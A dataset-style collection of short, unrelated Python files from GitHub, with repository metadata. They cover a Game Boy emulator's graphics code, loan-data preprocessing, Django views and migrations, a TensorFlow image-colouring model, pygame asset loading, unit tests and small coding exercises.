if buffer_x < 0 or buffer_x >= Window.SCREEN_WIDTH:
continue
position = line_width + buffer_x
color = (palette >> (pixel * 2)) & 0x3
if priority or self.framebuffer[position] == self.rgb(0):
self.framebuffer[position] = self.rgb_sprite(color)
class LCDControlRegister:
# LCD Control Register
# Bit 7 - LCD Display Enable (0=Off, 1=On)
# Bit 6 - Window Tile Map Display Select (0=9800-9BFF, 1=9C00-9FFF)
# Bit 5 - Window Display Enable (0=Off, 1=On)
# Bit 4 - BG & Window Tile Data Select (0=8800-97FF, 1=8000-8FFF)
# Bit 3 - BG Tile Map Display Select (0=9800-9BFF, 1=9C00-9FFF)
# Bit 2 - OBJ (Sprite) Size (0=8x8, 1=8x16)
# Bit 1 - OBJ (Sprite) Display Enable (0=Off, 1=On)
# Bit 0 - BG/Window Display/Priority (0=Off, 1=On)
def __init__(self, mmu : MMU):
self.mmu = mmu
def lcdc_status(self) -> int:
return self.mmu.read_byte(IO_Registers.LCDC)
def lcd_display_enable(self) -> bool:
return self.lcdc_status() & 0b10000000 == 0b10000000
def window_tile_map_display_select(self) -> int:
return 0x9c00 if self.lcdc_status() & 0b01000000 == 0b01000000 else 0x9800
def window_display_enable(self) -> bool:
return self.lcdc_status() & 0b00100000 == 0b00100000
def bg_and_window_tile_data_select(self) -> int:
return 0x8000 if self.lcdc_status() & 0b00010000 == 0b00010000 else 0x8800
def bg_tile_map_display_select(self) -> int:
return 0x9c00 if self.lcdc_status() & 0b00001000 == 0b00001000 else 0x9800
def sprite_size(self) -> int:
return 16 if self.lcdc_status() & 0b00000100 == 0b00000100 else 8
def sprite_display_enable(self) -> bool:
return self.lcdc_status() & 0b00000010 == 0b00000010
def bg_window_display_priority(self) -> bool:
return self.lcdc_status() & 0b00000001 == 0b00000001
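# Hedged wiring sketch (MMU/InterruptManager construction is assumed to
# match the rest of vsgb; illustration only):
#   mmu = MMU()
#   ppu = PPU(mmu, InterruptManager(mmu))
#   ppu.step(4)  # advance the PPU state machine by four clock cycles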
| [
"[email protected]"
] | |
4aa34266c685f2f11224712c0c307105ac9c88c8 | 9a4394a6f6f186722121de02852f05d201c85ddb | /test.py | 484c8172ca949c84ec1c2c03e778c1fe035b02e5 | [] | no_license | narendramishra91/Loan-Prediction | e2aa231bad534578dbe5c5306b0da2e28894f031 | 8cdb680470a3ca3ab266f026e9ed7399f14928bf | refs/heads/master | 2023-01-11T12:21:02.749773 | 2020-11-16T19:46:28 | 2020-11-16T19:46:28 | 282,413,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,014 | py | import pandas as pd
def dataFunction():
data = pd.read_csv("loan_dataset.csv")
data.dropna(subset=['Credit_History','Married', 'Gender', 'LoanAmount', 'Dependents' ], axis=0, inplace = True)
data['Loan_Amount_Term'].fillna(360, inplace = True)
data['Self_Employed'].fillna('No', inplace = True)
data['Married'].replace({'Yes':1, 'No':0}, inplace = True)
data['Education'].replace({'Graduate':1, 'Not Graduate':0}, inplace = True)
data['Gender'].replace({'Male':1, 'Female':0}, inplace = True)
data['Self_Employed'].replace({'Yes':1, 'No':0}, inplace = True)
data['Loan_Status'].replace({'Y':1, 'N':0}, inplace = True)
data['Property_Area'].replace({'Rural':1, 'Urban':2, 'Semiurban':3}, inplace = True)
data['Dependents'].replace({'3+':3}, inplace = True)
data.drop(['Loan_ID'], axis = 1, inplace = True)
return data
def Accuracy(_matrix):
    # accuracy = (TN + TP) / (TN + TP + FN + FP) for a 2x2 confusion matrix
    accu = (_matrix[0][0] + _matrix[1][1]) / (_matrix[0][0] + _matrix[1][1] + _matrix[1][0] + _matrix[0][1])
    return accu
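if __name__ == '__main__':
    # Hedged smoke test with a hypothetical 2x2 confusion matrix laid out as
    # [[TN, FP], [FN, TP]], so accuracy = (TN + TP) / total.
    demo_matrix = [[50, 10], [5, 35]]
    print(Accuracy(demo_matrix))  # expected 0.85 under Python 3 division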
| [
"[email protected]"
] | |
981d0b7d42384fb91e0a4dbc2b3e07ad6d587524 | 52a1cadbb76531065fadbfc29d8e8faa644f38ce | /day 3_8.py | 6d1191cb39b1864bbb7086cd349442fab19c90d7 | [] | no_license | Harshil-Madaan/PythonCourse | d602eb6f4b031e2477eb21c47e79308e3ade9862 | 8590703cda1d6bdbe9bbe730d376a585a4437562 | refs/heads/master | 2022-12-04T22:00:34.727481 | 2022-11-16T03:57:56 | 2022-11-16T03:57:56 | 231,540,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | food=input("what is your favourite food?")
if food == 'pizza':
    print("the answer is correct")
| [
"[email protected]"
] | |
a709c958c12a1c8bfdb511004e2eeaa5e8856efe | 6400d27c98dc94171132ce56782bfd750f5eacee | /runarrange.py | 84153e5b17686222efc992550b8dd7fffac04bb2 | [
"MIT"
] | permissive | SutirthaChakraborty/LeaderSTeM | a0e3cb038d7fbbd489884dc3f8e312c82689309f | 25dfbb14d4d62444d5ebe7721644a250b3024e5d | refs/heads/master | 2023-01-13T14:35:05.343219 | 2020-11-14T10:12:37 | 2020-11-14T10:12:37 | 282,326,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | import os
txt="list2.txt"
with open(txt) as f:
lines=f.read().splitlines()
for i in lines:
print(i)
os.system("python ArrangeDataset.py "+i) | [
"[email protected]"
] | |
f746c7225f80a100d3823d8f0ba8896ce614b991 | 602f1d5ce6610cce4053f6b1b5bb5a5e8d87df4c | /Robin/DataStructures/Wrappers/__init__.py | 28e49b230b113efa603f0d75a8a8678971234a34 | [] | no_license | Robin-Dillen/gas | 082bbfad7777171bce18e7f426924eee1a17424e | 5ef22f5b6323e6b25dee91ecfac6fa450d27a7c9 | refs/heads/main | 2023-04-25T09:53:46.726081 | 2021-05-10T10:35:53 | 2021-05-10T10:35:53 | 327,727,013 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | from .BSTTable import BSTTable
from .LinkedChainTable import LinkedChainTable
from .RBTTable import RedBlackTreeTable
| [
"[email protected]"
] | |
4327c210401985604466939fc38f10691eaa2bd7 | e92209e1e8916ca9fbf44dcc11dd3093d47a77f6 | /homework/views.py | 78d8410d6bf9589cd7b70f95ed039a18b5351313 | [] | no_license | zhangwei725/django_model | 2a7bce0c86464604a06377932e0db92703a1a719 | 1bfd12dd11f3ac501131fd6751a70c753e711d01 | refs/heads/master | 2020-04-06T13:59:08.694788 | 2018-11-14T09:19:33 | 2018-11-14T09:19:33 | 157,522,750 | 9 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from django.shortcuts import render
from model02.models import Goods
def shops(request):
goods = Goods.objects.all()
return render(request, 'shops.html', context={'goods': goods})
def emp_list(request):
return render(request, 'emp_list.html')
| [
"[email protected]"
] | |
0d90aed2abf8631bd27350edf155dbaa887357d0 | 0435f7790fa66b6263d1b9ccbf255892321eb205 | /guess_colors.py | 33607b8bacf9a3197ca7a0a517c178fb15b8e757 | [] | no_license | cryingmiso/Deep-Auto-Coloring | 698d1252f2a676306a1bc2a2427dab33286d4882 | 0e2c31a33b2f34db7a5199712a4932b8e3c421ef | refs/heads/master | 2020-03-12T19:21:58.073487 | 2018-06-29T04:42:16 | 2018-06-29T04:42:16 | 130,783,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,899 | py | import tensorflow as tf
import numpy as np
import os
from glob import glob
import sys
import math
from random import randint
from utils import *
import utils
class Palette():
def __init__(self, imgsize=256, batchsize=4):
print("Loading Palatte")
self.batch_size = batchsize
self.batch_size_sqrt = int(math.sqrt(self.batch_size))
self.image_size = imgsize
self.output_size = imgsize
self.gf_dim = 64
self.df_dim = 64
self.z_dim = 64
self.input_colors = 1
self.input_colors2 = 3
self.output_colors = 3
bnreset()
self.line_images = tf.placeholder(tf.float32, [self.batch_size, self.image_size, self.image_size, self.input_colors])
self.real_images = tf.placeholder(tf.float32, [self.batch_size, self.image_size/16, self.image_size/16, self.output_colors])
with tf.variable_scope("col"):
z_mean, z_stddev = self.encoder(self.real_images)
samples = tf.random_normal([self.batch_size, self.z_dim], 0, 1, dtype=tf.float32)
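            # Reparameterisation trick (VAE-style): z = mean + stddev * eps,
            # eps ~ N(0, I), so the sampling step stays differentiable.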
self.guessed_z = z_mean + (z_stddev * samples)
# references: line_images,
self.generated_images = self.generator(self.line_images, self.guessed_z)
self.g_loss = tf.reduce_mean(tf.abs(self.real_images - self.generated_images)) * 100
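        # Latent loss below is KL(N(mean, stddev^2) || N(0, 1)) summed over
        # the latent dimensions (assuming the encoder's second head emits a
        # standard deviation).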
self.l_loss = tf.reduce_mean(0.5 * tf.reduce_sum(tf.square(z_mean) + tf.square(z_stddev) - tf.log(tf.square(z_stddev)) - 1, axis=1))
self.cost = tf.reduce_mean(self.g_loss + self.l_loss)
t_vars = tf.trainable_variables()
self.g_vars = [var for var in t_vars if ('col' in var.name)]
self.g_optim = tf.train.AdamOptimizer(0.0002, beta1=0.5).minimize(self.cost, var_list=self.g_vars)
def encoder(self, real_imgs):
with tf.variable_scope(tf.get_variable_scope(), reuse=False):
h0 = lrelu(conv2d(real_imgs, self.df_dim, name="e_h0_col")) #128 x 128 x 64
h1 = lrelu(bn(conv2d(h0, self.df_dim, name="e_h1_col"))) #64 x 64 x 64
h2 = lrelu(bn(conv2d(h1, self.df_dim, name="e_h2_col"))) #32
h3 = lrelu(bn(conv2d(h2, self.df_dim, name="e_h3_col"))) #16
h4 = lrelu(bn(conv2d(h3, self.df_dim, name="e_h4_col"))) #8
h5 = lrelu(bn(conv2d(h4, self.df_dim, name="e_h5_col"))) #4
mean = linear(tf.reshape(h5, [self.batch_size, -1]), self.z_dim, "e_mean_col") #(4*4*64) -> 64
stddev = linear(tf.reshape(h5, [self.batch_size, -1]), self.z_dim, "e_stddev_col") #(4*4*64) -> 64
return mean, stddev
def generator(self, img_in, z):
with tf.variable_scope(tf.get_variable_scope(), reuse=False):
s = self.output_size
s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128)
z0 = linear(z, (self.image_size/64)*(self.image_size/64)*self.df_dim, "g_z0_col") # 4 x 4 x 64
z1 = tf.reshape(z0, [self.batch_size, int(self.image_size/64), int(self.image_size/64), self.df_dim])
# image is (256 x 256 x input_c_dim)
e1 = conv2d(img_in, self.gf_dim, name='g_e1_conv_col') # e1 is (128 x 128 x self.gf_dim)
e2 = bn(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv_col')) # e2 is (64 x 64 x self.gf_dim*2)
e3 = bn(conv2d(lrelu(e2), self.gf_dim*2, name='g_e3_conv_col')) # e3 is (32 x 32 x self.gf_dim*2)
e4 = bn(conv2d(lrelu(e3), self.gf_dim*2, name='g_e4_conv_col')) # e4 is (16 x 16 x self.gf_dim*2)
e5 = bn(conv2d(lrelu(e4), self.gf_dim*2, name='g_e5_conv_col')) # e4 is (8 x 8 x self.gf_dim*2)
e6 = bn(conv2d(lrelu(e5), self.gf_dim*4, name='g_e6_conv_col')) # e4 is (4 x 4 x self.gf_dim*2)
combined = tf.concat([z1, e6],3)
e7 = bn(deconv2d(combined, [self.batch_size, int(self.image_size/32), int(self.image_size/32), int(self.gf_dim*4)], name='g_e7_conv_col')) # e4 is (8 x 8 x self.gf_dim*2)
e8 = deconv2d(lrelu(e7), [self.batch_size, int(self.image_size/16), int(self.image_size/16), 3], name='g_e8_conv_col') # e5 is (16 x 16 x 3)
return tf.nn.tanh(e8)
def imgprocess(self, cimg, sampling=False):
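        # Downsample a (hardcoded) 256x256 colour image to a 16x16 grid of
        # average colours: each cell is the per-channel mean of one
        # 16x16-pixel block (seg_len = 256/16).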
num_segs = 16
seg_len = 256/num_segs
seg = np.ones((num_segs, num_segs, 3))
for x in xrange(num_segs):
for y in xrange(num_segs):
seg[x:(x+1), y:(y+1), 0] = np.average(cimg[x*seg_len:(x+1)*seg_len, y*seg_len:(y+1)*seg_len, 0])
seg[x:(x+1), y:(y+1), 1] = np.average(cimg[x*seg_len:(x+1)*seg_len, y*seg_len:(y+1)*seg_len, 1])
seg[x:(x+1), y:(y+1), 2] = np.average(cimg[x*seg_len:(x+1)*seg_len, y*seg_len:(y+1)*seg_len, 2])
return seg
def train(self):
s = tf.Session()
s.run(tf.initialize_all_variables())
self.loadmodel(s)
data = glob(os.path.join("imgs", "*.jpg"))
print(data[0])
base = np.array([get_image(sample_file) for sample_file in data[0:self.batch_size]])
base_edge = np.array([cv2.adaptiveThreshold(cv2.cvtColor(ba, cv2.COLOR_BGR2GRAY), 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, blockSize=9, C=2) for ba in base]) / 255.0
base_edge = np.expand_dims(base_edge, 3)
base_colors = np.array([self.imgprocess(ba) for ba in base]) / 255.0
ims("results/base_line.jpg",merge(base_edge, [self.batch_size_sqrt, self.batch_size_sqrt]))
ims("results/base_colors.jpg",merge_color(np.array([cv2.resize(x, (256,256), interpolation=cv2.INTER_NEAREST) for x in base_colors]), [self.batch_size_sqrt, self.batch_size_sqrt]))
datalen = len(data)
for e in xrange(20000):
for i in range(datalen / self.batch_size):
batch_files = data[i*self.batch_size:(i+1)*self.batch_size]
batch = np.array([get_image(batch_file) for batch_file in batch_files])
batch_edge = np.array([cv2.adaptiveThreshold(cv2.cvtColor(ba, cv2.COLOR_BGR2GRAY), 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, blockSize=9, C=2) for ba in batch]) / 255.0
batch_edge = np.expand_dims(batch_edge, 3)
batch_colors = np.array([self.imgprocess(ba) for ba in batch]) / 255.0
g_loss, l_loss, _ = self.sess.run([self.g_loss, self.l_loss, self.g_optim], feed_dict={self.real_images: batch_colors, self.line_images: batch_edge})
print("%d: [%d / %d] l_loss %f, g_loss %f" % (e, i, (datalen/self.batch_size), l_loss, g_loss))
if i % 100 == 0:
recreation = self.sess.run(self.generated_images, feed_dict={self.real_images: base_colors, self.line_images: base_edge})
print(recreation.shape)
ims("results/"+str(e*100000 + i)+"_base.jpg",merge_color(np.array([cv2.resize(x, (256,256), interpolation=cv2.INTER_NEAREST) for x in recreation]), [self.batch_size_sqrt, self.batch_size_sqrt]))
recreation = self.sess.run(self.generated_images, feed_dict={self.real_images: batch_colors, self.line_images: batch_edge})
ims("results/"+str(e*100000 + i)+".jpg",merge_color(np.array([cv2.resize(x, (256,256), interpolation=cv2.INTER_NEAREST) for x in recreation]), [self.batch_size_sqrt, self.batch_size_sqrt]))
ims("results/"+str(e*100000 + i)+"_line.jpg",merge(batch_edge, [self.batch_size_sqrt, self.batch_size_sqrt]))
ims("results/"+str(e*100000 + i)+"_original.jpg",merge_color(np.array([cv2.resize(x, (256,256), interpolation=cv2.INTER_NEAREST) for x in batch_colors]), [self.batch_size_sqrt, self.batch_size_sqrt]))
if i % 1000 == 0:
self.save("./checkpoint", e*100000 + i)
def loadmodel(self, sess, load_discrim=True):
self.sess = sess
# self.sess.run(tf.initialize_all_variables())
if load_discrim:
self.saver = tf.train.Saver()
else:
self.saver = tf.train.Saver(self.g_vars)
print([v.name for v in self.g_vars])
if self.load("./checkpoint"):
print("Loaded")
else:
print("Load failed")
def sample(self):
s = tf.Session()
s.run(tf.initialize_all_variables())
self.loadmodel(s, False)
data = glob(os.path.join("imgs", "*.jpg"))
datalen = len(data)
for i in range(min(100,datalen / self.batch_size)):
batch_files = data[i*self.batch_size:(i+1)*self.batch_size]
batch = np.array([cv2.resize(imread(batch_file), (256,256)) for batch_file in batch_files])
batch_normalized = batch/255.0
random_z = np.random.normal(0, 1, [self.batch_size, self.z_dim])
batch_edge = np.array([cv2.adaptiveThreshold(cv2.cvtColor(ba, cv2.COLOR_BGR2GRAY), 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, blockSize=9, C=2) for ba in batch]) / 255.0
batch_edge = np.expand_dims(batch_edge, 3)
recreation = self.sess.run(self.generated_images, feed_dict={self.line_images: batch_edge, self.guessed_z: random_z})
ims("results/sample_"+str(i)+".jpg",merge_color(np.array([cv2.resize(x, (256,256), interpolation=cv2.INTER_NEAREST) for x in recreation]), [self.batch_size_sqrt, self.batch_size_sqrt]))
ims("results/sample_"+str(i)+"_origin.jpg",merge_color(batch_normalized, [self.batch_size_sqrt, self.batch_size_sqrt]))
ims("results/sample_"+str(i)+"_line.jpg",merge_color(batch_edge, [self.batch_size_sqrt, self.batch_size_sqrt]))
def save(self, checkpoint_dir, step):
model_name = "model"
model_dir = "tr_colors"
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
print(" [*] Reading checkpoint...")
model_dir = "tr_colors"
checkpoint_dir = os.path.join(checkpoint_dir, model_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
return True
else:
return False
if __name__ == '__main__':
if len(sys.argv) < 2:
print("Usage: python main.py [train, sample]")
else:
cmd = sys.argv[1]
if cmd == "train":
c = Palette()
c.train()
elif cmd == "sample":
c = Palette(256,1)
c.sample()
else:
print("Usage: python main.py [train, sample]")
| [
"[email protected]"
] | |
68faa6edb58189ee11752aad38f554cb7cf99844 | d79978e32325bedb0ea9eba911d92c04e490ea2b | /pocket/image.py | 7a702a7a6a4a8f26481bd4a3c4553176e0620577 | [] | no_license | hypan599/mr_jack | b3e7f74c66a1472773ce51cff4c2b8b766aa6f08 | e767a6fc999707abcf66187b544961898c6070a8 | refs/heads/master | 2023-03-10T09:18:35.532169 | 2019-09-21T20:23:58 | 2019-09-21T20:23:58 | 112,902,900 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,668 | py | # -*- coding:utf-8 -*-
import pygame
import os
pygame.init()
screen = pygame.display.set_mode((1560, 920), 0, 32)
font = pygame.font.Font("msyh.ttf", 30)
# color
yellow = 128, 128, 0
grey = 128, 128, 128
white = 255, 255, 255
black = 0, 0, 0
root_path = "images" + os.sep
hourglass = pygame.image.load(root_path + "hourglass.PNG").convert_alpha()
begin = pygame.image.load(root_path + "begin.jpg").convert()
button_mouse_on = pygame.image.load(root_path + "button_mouse_on.PNG").convert_alpha()
map_path = root_path + "map" + os.sep
image_dict = {'guaidaojide': {},
'maolilan': {},
'huiyuanai': {},
'aliboshi': {},
'mumushisan': {},
'chijingxiuyi': {},
'beiermode': {},
'yuanshanheye': {},
'lingmuyuanzi': {}
}
states = [str(j) + str(i) for j in range(2) for i in range(4)] # ['00', '01', '02', '03', '10', '11', '12', '13']
for name, d in image_dict.items():
for state in states:
        fname = map_path + name + state + ".JPG"  # avoid shadowing the py2 builtin `file`
        d[name + state] = pygame.image.load(fname).convert()
map_mouse_on = pygame.image.load(map_path + "map_mouse_on.PNG").convert_alpha()
map_used = pygame.image.load(map_path + "map_used.PNG").convert_alpha()
detective_path = root_path + "detective" + os.sep
detective_images = {"kenan": pygame.image.load("images/detective/kenan.PNG").convert_alpha(),
"maolixiaowulang": pygame.image.load("images/detective/maolixiaowulang.PNG").convert_alpha(),
"fubupingci": pygame.image.load("images/detective/fubupingci.PNG").convert_alpha()
}
detective_mouse_on = pygame.image.load(detective_path + "detective_mouse_on.PNG").convert_alpha()
detective_available = pygame.image.load(detective_path + "detective_available.PNG").convert_alpha()
action_card_path = root_path + "action" + os.sep
action_card_images = {
    "1f": pygame.image.load(action_card_path + "1f.PNG").convert_alpha(),
    "1b": pygame.image.load(action_card_path + "1b.PNG").convert_alpha(),
    "2f": pygame.image.load(action_card_path + "2f.PNG").convert_alpha(),
    "2b": pygame.image.load(action_card_path + "2b.PNG").convert_alpha(),
    "3f": pygame.image.load(action_card_path + "3f.PNG").convert_alpha(),
    "3b": pygame.image.load(action_card_path + "3b.PNG").convert_alpha(),
    "4f": pygame.image.load(action_card_path + "4f.PNG").convert_alpha(),
    "4b": pygame.image.load(action_card_path + "4b.PNG").convert_alpha()
}
action_mouse_on = pygame.image.load(action_card_path + "action_mouse_on.PNG").convert_alpha()
action_used = pygame.image.load(action_card_path + "action_used.PNG").convert_alpha()
| [
"[email protected]"
] | |
cf0a90367e21ba85660810a07515523155104fb6 | f0a2d759e2fa0c6f2484b3859d8c97ae90168578 | /ffl/setup.py | 92220ec627a4bd835d731c7c807b7d0901f4a418 | [] | no_license | cjsantucci/fantasyTool | 9e817f2f8d129a008940b3df1ad7afaa94f62ea2 | 77e41c2f9b8c05165aefc4b38f3dd1d97dbe7063 | refs/heads/master | 2021-01-19T13:33:33.956244 | 2017-09-09T03:20:54 | 2017-09-09T03:20:54 | 82,398,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | from setuptools import setup
setup(
name = 'ffl',
version = '1.0',
description = "XML data parser for fantasy sports",
author = 'Chris Sandy and Ken Kohler',
author_email = '[email protected]',
license = 'MIT',
url = 'https://github.com/cjsantucci/fantasyTool/',
packages = [ "ffl", "compute", "grabbers", "vis" ],
install_requires = []
) | [
"[email protected]"
] | |
99fa4242ead8dd989e34feaa87b6080746b5a648 | d98d39282ab35e1556cce25ac706ba607b34b0e5 | /Greedy Algorithms/Maximum Number of Prizes/maximum_number_of_prizes_unit_tests.py | 150769f066900b1f02fa317deba12a4e2d583544 | [] | no_license | grommy/algorithmic_toolbox | e2129ade8bb2a69d34bf8ad9693090b96dadaef3 | bd39a7753c54ce0831381c180f96b7500d506c3e | refs/heads/master | 2023-09-05T19:02:37.397238 | 2021-11-19T14:59:41 | 2021-11-19T14:59:41 | 429,762,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 549 | py | import unittest
from maximum_number_of_prizes import compute_optimal_summands
class MaximumNumberOfPrizes(unittest.TestCase):
def test(self):
for (n, answer) in [(1, 1), (6, 3), (100, 13), (4, 2)]:
summands = compute_optimal_summands(n)
self.assertEqual(len(summands), answer)
self.assertEqual(sum(summands), n)
summands = sorted(summands)
self.assertTrue(all(summands[i] < summands[i + 1] for i in range(len(summands) - 1)))
if __name__ == '__main__':
unittest.main()
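# Note on the expected sizes above: the optimal summands are the greedy
# distinct values 1, 2, 3, ..., so len(summands) is the largest k with
# k*(k+1)/2 <= n; e.g. n = 100 gives k = 13 since 13*14/2 = 91 <= 100 < 105.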
| [
"[email protected]"
] | |
629734b25037a9e9e3d1c41b2b77b21995f923c2 | d9be5e5cc6c302d27fe0e61dbb04b33eec89c94a | /interviewAssigner/Assigner/migrations/0003_auto_20190927_2008.py | 8096ccdaee19b6b2ddd1b2b7bca390253ea45e3e | [] | no_license | aswanthkoleri/interviewbit-interview-question-solution | c79ea670f70359373e334f4418b1b2a27278854e | e2a2315b609b0cf954cec72a339aad543a09b163 | refs/heads/master | 2020-08-02T11:56:09.777168 | 2019-09-27T20:34:01 | 2019-09-27T20:34:01 | 211,343,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | # Generated by Django 2.1.7 on 2019-09-27 20:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Assigner', '0002_auto_20190927_1942'),
]
operations = [
migrations.AlterField(
model_name='interview',
name='dateTime',
field=models.DateField(),
),
]
| [
"[email protected]"
] | |
1eeff8a6c9c7b758a4cd159661176f269703c660 | 357432c4126ed339a52eea6b74b013e26b168f35 | /custom_user/migrations/0001_initial.py | 928dc47adcd55099bb13c0e6a194059bce10e411 | [] | no_license | CAPCHIK/trytoimpress | e5fcf04be7281a0d589d8f2df9d912602366e6bc | 0fb0b93d3f72b02009f45d37cbf669e7dabf6c3f | refs/heads/master | 2023-04-07T03:59:53.229006 | 2021-04-14T17:22:11 | 2021-04-14T17:22:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,138 | py | # Generated by Django 3.2 on 2021-04-12 19:32
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CustomUser',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('email', models.EmailField(max_length=63, unique=True, verbose_name='ะะดัะตั ัะปะตะบััะพะฝะฝะพะน ะฟะพััั')),
('date_joined', models.DateTimeField(auto_now_add=True)),
('last_login', models.DateTimeField(auto_now=True)),
('is_admin', models.BooleanField(default=False)),
('is_staff', models.BooleanField(default=False)),
('is_active', models.BooleanField(default=True)),
('is_superuser', models.BooleanField(default=False)),
],
options={
'abstract': False,
},
),
]
| [
"[email protected]"
] | |
f80575a2cf3deabe40265f47e2b9abf084531b37 | 46357db3b1c1af699384d9cba1ffbc3c732117ad | /pytest_tutorial/basics/test_sample2.py | b47c62dc8c09358391bad0cc064fbefd13dd00fa | [] | permissive | khanhdodang/automation-training-python | 28fbd70ca4bc84e47cf17d1e4702513863e38c44 | b16143961cee869c7555b449e2a05abeae2dc3b5 | refs/heads/master | 2023-07-11T05:21:34.495851 | 2021-08-18T01:29:37 | 2021-08-18T01:29:37 | 285,208,030 | 0 | 8 | MIT | 2020-09-29T07:01:15 | 2020-08-05T07:01:46 | Python | UTF-8 | Python | false | false | 216 | py | import pytest
def test_file2_method1():
x=5
y=6
assert x+1 == y,"test failed"
assert x == y,"test failed because x=" + str(x) + " y=" + str(y)
def test_file2_method2():
x=5
y=6
assert x+1 == y,"test failed"
| [
"[email protected]"
] | |
1aa6b1f6e602ea484a6118bb577a879a60aa4068 | 99848dc3b916ca104690be7e9b43b9ed3ead1100 | /eboard/clients/apps.py | 74c29bd24dfd60cde3bbca81a9c82c8b6bf4aa8b | [] | no_license | Sammra-22/CS-Eboard | 45e24714d0320dcb29b595fe9d49d46ed340547b | d45f4b3149607b58389b3d32cd60dc514826ff58 | refs/heads/master | 2022-02-23T17:46:38.469113 | 2019-10-13T12:35:00 | 2019-10-13T12:35:00 | 214,808,712 | 0 | 0 | null | 2022-01-21T20:03:52 | 2019-10-13T11:33:16 | Python | UTF-8 | Python | false | false | 96 | py | from django.apps import AppConfig
class ClientsConfig(AppConfig):
name = 'eboard.clients'
| [
"[email protected]"
] | |
ac07756fec1c7a9602729712f74185d4631e88a2 | 9b021fc76be68b3a9fd886102bfda94b4899f583 | /sequential_search.py | 6fa797d988c949fdd59854c450543475096cc646 | [] | no_license | bhsaurabh/python-practice | 93f89446f0ecd9fc62b4a300bd0db029d948062b | 177b027820ef8504198852cc168268eab34d1447 | refs/heads/master | 2020-06-07T04:34:06.269652 | 2014-06-22T15:55:16 | 2014-06-22T15:55:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 930 | py | #!/usr/bin/python
def search(a_list, item):
"""
Search for an item in a list
O(N)
Args:
a_list: List to search in
item: Item to search for
Returns:
True, if item is found; False otherwise
"""
for el in a_list:
if el == item:
return True
return False
def ordered_search(a_list, item):
"""
Sequential search on an ordered list
O(N)
"""
for el in a_list:
if el == item:
return True # element found!
elif el > item:
# no more items need to be compared and the element is not in the list
break
return False
if __name__ == '__main__':
print(search([1,2,3,4,5,6,7,8,9], 7))
print(search([1,2,3,4,5,6,7,8,9], 0))
print(ordered_search([1,2,3,4,5,6,7,8,9], 7))
print(ordered_search([1,2,3,4,5,6,7,8,9], 10))
print(ordered_search([1,2,3,4,5,6,7,8,9], -1)) | [
"[email protected]"
] | |
9a0921bfc0b020a52319468a4533f51f8849f0d0 | ebb950e622e70c3b014d927ad017e42b78df2559 | /string_to_int.py | ff28e4648fa024a0029bf061065bb8ce785d4c04 | [] | no_license | KathaVachhani/Coding | 285525fc95992f20c14877764a187067d613f390 | 8130f91f1129405af381085285ea555c166c3e91 | refs/heads/master | 2022-12-29T00:22:42.791505 | 2020-10-16T10:34:15 | 2020-10-16T10:34:15 | 292,222,614 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | l=[('Tom', '12/04/1999', '65kg'), ('Ab de', '17/02/1990', '63kg'), ('Kholi', '16/02/1985', '62kg'), ('Chahal', '25/09/1985', '61kg')]
# print(len(l))
s_n=[]
s_b=[]
s_w=[]
for i in l:
    s_n.append(i[0])
    s_b.append(i[1])
    w_len = len(i[2]) - 2  # drop the trailing 'kg' unit before converting; avoids rebinding `l`
    s_w.append(int(i[2][0:w_len]))
print('Student name: ',s_n)
print('Student birthday: ',s_b)
print('Student weight: ',s_w) | [
"[email protected]"
] | |
4a3eaaaf6f9d8d3ecbb972131f7739edc3fa88b9 | 2749f9ac3c4bace174f171873775181f2e09ebfa | /strings/ex6_string_validators.py | b2a6c158d56f2b91958a415dcd34f6ee4bef9ef5 | [] | no_license | 0xhappy33/hackerrank_python | 82eb38573058ad13c24aebd049fec75ee5d1769f | 0c5c20a4c1763f31b9eb9fd96c5f754269699229 | refs/heads/master | 2023-05-25T22:07:16.317166 | 2018-02-06T08:50:28 | 2018-02-06T08:50:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | if __name__ == '__main__':
s = input()
    # note: building [s.isalnum(), ...] would evaluate each method on the
    # whole string up front; the per-character checks need the loop below
    for test in ('isalnum', 'isalpha', 'isdigit', 'islower', 'isupper'):
        # getattr performs the same dynamic lookup without string eval
        print(any(getattr(c, test)() for c in s))
| [
"[email protected]"
] | |
